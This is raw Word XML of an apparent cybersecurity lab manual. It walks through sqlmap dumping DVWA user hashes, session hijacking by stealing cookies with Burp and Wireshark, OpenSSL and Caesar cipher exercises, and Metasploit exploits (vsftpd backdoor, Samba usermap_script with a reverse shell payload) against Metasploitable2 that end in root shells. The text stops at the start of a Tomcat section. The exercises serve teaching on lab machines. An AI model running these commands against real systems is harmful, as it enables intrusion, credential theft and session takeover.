    <w:p w14:paraId="5FCC7527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sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=abcd1234; security=low" -D dvwa --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B73B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2D68D72D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Database: dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A13936B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[2 tables]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0B40F1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+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C74BEB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| users    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B86592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| guestbook|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A71481C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+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E846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1.3 Dump User Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E908B0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sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1" --cookie="PHPSESSID=abcd1234; security=low" -D dvwa -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FF2F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55BF49F2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username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26849DA9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password: 5f4dcc3b5aa765d61d8327deb882cf99 (MD5 hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36929810">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F35F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SESSION HIJACKING – Tools, Commands, and Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ADFD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 Session Hijacking Using Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E6F2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Step-by-Step (Safe Environment Example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF23E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1 — Capture Login Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E61A13B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Open DVWA → Turn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Intercept ON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Burp → Login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0273608E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Burp capture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4BCE7A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POST /DVWA/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3CDC37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username=admin&amp;password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD8F5CF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Cookie: PHPSESSID=4a3d12672e9ce4bbac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5AD9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2 — Extract Session Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01493D35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PHPSESSID=4a3d12672e9ce4bbac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BDC8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3 — Hijack Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CC9925">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Open browser → Cookie Editor → Replace cookie with stolen value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1BE2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D3AE2D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">You instantly become the logged-in victim user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>without knowing the password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECDBE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 Session Hijacking with Wireshark (HTTP Traffic Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F86D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Filters to capture session cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098A482A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http.cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF1FC5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Captured example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E727800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Cookie: PHPSESSID=4a3d12672e9ce4bbac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58724AA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Attacker adds it to their browser → Session hijacked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5DCC26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52DFC363">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537D627B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  <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Prac 7: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Use of software tools/commands to encrypt and decrypt password, implement encryption and decryption using Ceaser Cipher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D4A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Password Encryption &amp; Decryption Using Software Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39459BD5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OpenSSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for safe + legal cryptographic demonstration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7813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1.1 Encryption Using OpenSSL (Linux/Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F815B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Encrypt a password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B1907C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echo "mypassword" | openssl enc -aes-256-cbc -a -salt -pass pass:12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700AD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Sample Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012B9E1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U2FsdGVkX1+QxffgI4NYmQ2T1TMcwYcYZJ9l6H9fX/A=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DB3F79">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>encrypted form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the password mypassword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361EDC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 Decrypt using OpenSSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EBAE91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echo "U2FsdGVkX1+QxffgI4NYmQ2T1TMcwYcYZJ9l6H9fX/A=" | openssl enc -aes-256-cbc -a -d -pass pass:12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6494C9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256D2698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mypassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E5C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1.3 Summary Table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9"/>
        <w:gridCol w:w="3760"/>
        <w:gridCol w:w="1048"/>
      </w:tblGrid>
      <w:tr w14:paraId="5879B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FD8C47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0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09F569F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</w:tcPr>
          <w:p w14:paraId="26EFCC3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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4AB1D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7C734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OpenSSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="745F6A1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openssl enc -aes-256-cbc -a -salt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B760B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Encrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22D75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4087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OpenSSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AA9FD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openssl enc -aes-256-cbc -a -d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4664C49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Decrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A59100F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C9F1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Caesar Cipher Encryption &amp; Decryption (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550FD9F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The Caesar Cipher is a simple substitution cipher where each letter is shifted by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>n positions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2910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 Caesar Cipher – Python Code (Encryption &amp; Decryption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6514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Encryption Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D80638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def caesar_encrypt(text, shift):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58738176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result = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A7417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for char in text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77848998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if char.isalpha():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F73FF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    shift_base = 65 if char.isupper() else 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A31C725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    result += chr((ord(char) - shift_base + shift) % 26 + shift_base)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B1912F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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011BA181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        result += char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0F74C8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return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FFE8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Decryption Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F951AD9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def caesar_decrypt(cipher, shift):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2633CDA3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    return caesar_encrypt(cipher, -shift)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C64BD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Example Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC40F49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text = "HELLO"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4AF4C6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shift = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589D4A36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encrypted = caesar_encrypt(text, shift)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7924E434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decrypted = caesar_decrypt(encrypted, shift)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17539C40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print("Encrypted:", encrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9DF260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print("Decrypted:", decrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6856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50D49941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Encrypted: KHOOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0708317A">
      <w:p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Decrypted: HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B169A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26162041">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A01E25">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB7D5CC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D950BAE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>PART 1 – Setting Up Metasploit &amp; Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D27997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Tool:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565AD55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Target:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable2 Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A64CF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Environment:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux (Attacker), Metasploitable2 (Victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9521A6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Step 1: Start Metasploitable Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3EC981">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Action:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Boot Metasploitable2 VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33105C">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687251A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Login: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msfadminPassword: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msfadminIP Address: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192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711069C3">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Analysis:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Metasploitable provides intentionally vulnerable services for safe penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63164C7E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Step 2: Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDE914F">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command (Kali Linux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F4B03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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E950BA9">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B95B02E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=[ metasploit v6.x ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E15467E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msf6 &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220DD40D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106246A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CAB97A9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>PART 2 – Host Discovery &amp; Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2322EDA5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Step 1: Scan Metasploitable using Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF215C0">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5D218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nmap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-sV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192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64910E33">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA5A7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22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/tcp  open  ssh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21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/tcp  open  ftp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23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/tcp  open  telnet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445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/tcp open  smb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80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tcp  open  http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(Apache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4CD3A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164E870D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Step 2: Search Exploits in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9838FF">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606FA0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search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vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2086CCE7">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6E671734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exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48084C11">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6CFEE2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>PART 3 – Exploiting VSFTPD Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D0E0C2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Step 1: Load the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3B7BF">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBD979F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use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443A5201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Step 2: Set Target IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C355069">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480765F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set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RHOSTS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192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7630CC3E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Step 3: Run the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5040E">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7220319C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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E609EF9">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output (Example):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB8950E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Command shell session 1 opened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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E29EAC3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uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43F252">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F6B7C7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14417F58">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>PART 4 – Exploiting Samba (SMB) Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EDA2AA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Step 1: Search Samba Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580823E0">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0B5A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search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samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE71358">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206FC70E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exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F15AB94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Step 2: Use Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9E5CA4">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E12A63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use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDA6919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Step 3: Configure the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E7641">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EFE646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set RHOSTS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192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C33C7C4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set PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F027A08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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191CD764">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4913CB4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[*]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Command shell session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2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opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D482889">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F5814C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
        </w:rPr>
        <w:t>PART 5 – Gaining a Meterpreter Session (Tomcat Manager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721236E8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Step 1: Search Tomcat Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126FEE32">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
